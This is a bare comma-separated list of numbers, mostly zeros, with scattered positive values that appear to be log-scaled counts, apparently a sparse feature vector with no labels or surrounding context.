0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0, 2.4849066497880004, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.952096120109145, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0, 1.7412592803704001, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 2.6390573296152584, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.6094379124341003, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.6931471805599453, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.9459101490553132, 0, 4.406719247264253, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 2.1972245773362196, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.95562797505323, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.772588722239781, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 3.2188758248682006, 1.6094379124341003, 0.0, 1.0986122886681098, 0.0, 0, 0, 0.0, 0.0, 0.0, 5.46286043483228, 0.0, 0, 0.0, 0.0, 1.7412592803704001, 0.0, 0.0, 0.0, 2.772588722239781, 0.0, 0, 0.0, 0.0, 0, 1.6094379124341003, 0.0, 2.8398715690385097, 0.0, 0.0, 0.6931471805599453, 0.0, 1.3862943611198906, 5.101797476893978, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.649511027115099, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 3.58351893845611, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 2.1972245773362196, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 